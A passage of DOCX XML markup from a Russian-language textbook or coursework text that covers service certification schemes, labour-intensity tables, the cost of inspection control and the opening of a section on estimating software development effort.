          <w:tcPr>
            <w:tcW w:w="1560"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275"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2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>То же</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>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1418"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992"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417"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1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275"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c>
          <w:tcPr>
            <w:tcW w:w="2305" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Контроль стабильности системы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 1 предусматривает оценку мастерства исполнителя услуг путем проверки его квалификации, знаний технологической и нормативной документации, а также последующий инспекционный контроль за выполненной услугой. Рекомендуется применять для сертификации материальных услуг, оказываемых гражданами-предпринимателями и небольшими предприятиями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 2 предусматривает оценку мастерства исполнителя и последующий инспекционный контроль за выполненными услугами путем проведения социологического опроса потребителей услуг. Рекомендуется применять для сертификации медицинских, парикмахерских услуг, услуг физической культуры, спорта и обучения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 3предусматривает оценку процесса оказания услуг, включающую проверку технологического процесса исполнения услуг, квалификации исполнителя, условий обслуживания, а также выборочную проверку результатов услуги и инспекционный контроль стабильности процесса оказания услуги. Рекомендуется применять для сертификации услуг по ремонту на средних и крупных предприятиях, для изготовления изделий по индивидуальным заказам, услуг общественного питания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 4 аналогична схеме 3 в части оценки процесса оказания услуги, но без проверки результатов услуги. Инспекционный контроль проводится путем социологического опроса для сертификации транспортных услуг, услуг связи и др.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 5 предусматривает аттестацию предприятия, включающую проверку санитарно-гигиенических условий обслуживания потребителей, ассортимента и качества услуги, качества обслуживания. Рекомендуется для сертификации гостиниц, ресторанов, кинотеатров и пр. Инспекционный контроль может осуществляться путем социологического опроса потребителей услуг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема 6предусматривает сертификацию системы качества и последующий инспекционный контроль за стабильностью ее функционирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 3</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значения трудоемкости при сертификации продукции</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4766"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="636"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>№ схемы сертификации</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2а</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3а</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4а</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Предельный норматив трудоемкости, не свыше, чел.-дн.</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10,5</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10,5</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15,5</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10,5</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15,5</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10,5</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15,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>№ схемы сертификации</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9а</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10а</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Предельный норматив трудоемкости, не свыше, чел.-дн.</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18,5</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15,0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9,0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7,0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8,0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15,0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8,0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15,0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значения трудоемкости при сертификации услуг</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9354" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6258"/>
        <w:gridCol w:w="516"/>
        <w:gridCol w:w="516"/>
        <w:gridCol w:w="516"/>
        <w:gridCol w:w="516"/>
        <w:gridCol w:w="516"/>
        <w:gridCol w:w="516"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6258" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Номер схемы сертификации</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r>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6258" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Предельный норматив трудоемкости, не свыше, чел./дн.</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6,0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8,0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9,0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5,0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8,0</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9,0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Стоимость инспекционного контроля, проводимого с целью проверки соответствия сертифицированной продукции требованиям нормативной документации, определяется по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1489226" cy="410400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Рисунок 30" descr="http://ok-t.ru/studopedia/baza14/71156389034.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ok-t.ru/studopedia/baza14/71156389034.files/image003.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId449" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1491375" cy="410992"/>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где:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>а.д.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - стоимость работ по сбору и анализу данных о качестве сертифицированной продукции, руб.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - стоимость одной проверки, проведенной в рамках инспекционного контроля, р.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>q - число проверок;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>к.м.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - стоимость разработки корректирующих мероприятий, р.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При проведении сертификации обычно известны следующие условия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Схема сертификации; средняя дневная ставка специалиста – 50 руб.; норматив начислений на зарплату – 39,5%; коэффициент накладных расходов – 150%; уровень рентабельности – 35%.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стоимость испытаний продукции в аккредитованной лаборатории – 500 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сертификат соответствия выдается на 3 года; инспекционный контроль – 2 раза в год; стоимость работ по сбору и анализу данных – 1000 руб.; стоимость одной проверки – 250 руб.; стоимость корректирующих мероприятий – 5000 руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Целью планирования разработки программного обеспечения (ПО) является определение затрат трудовых и машинных ресурсов для разработки ПО. Для достижения поставленной цели планирование осуществляется после выбора технических и программных средств, если они не заданы в техническом задании. Предполагается, что разработку ПО выполняет инженер - программист с оплатой труда не ниже 6-7 разрядов ЕТС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Планирование включает следующие этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Определение действий по разработке ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Установление очередности действий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 Определение объема ресурсов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 Подготовка плана.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На первом этапе составляется список действий для успешной реализации выбранного варианта разработки ПО. Этот список может пересматриваться, дополняться, перегруппировываться или разбиваться на более детализированные списки в ходе планирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На втором этапе определяется последовательность действий по разработке ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На третьем этапе определяется объем ресурсов для выполнения действий. Продолжительность действий характеризуется высокой неопределенностью и основывается на b-распределении. Для каждого действия устанавливаются три экспертные оценки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- оценка продолжительности действия при наиболее благоприятном стечении обстоятельств;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- оценка продолжительности действия при самом неблагоприятном стечении обстоятельств;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
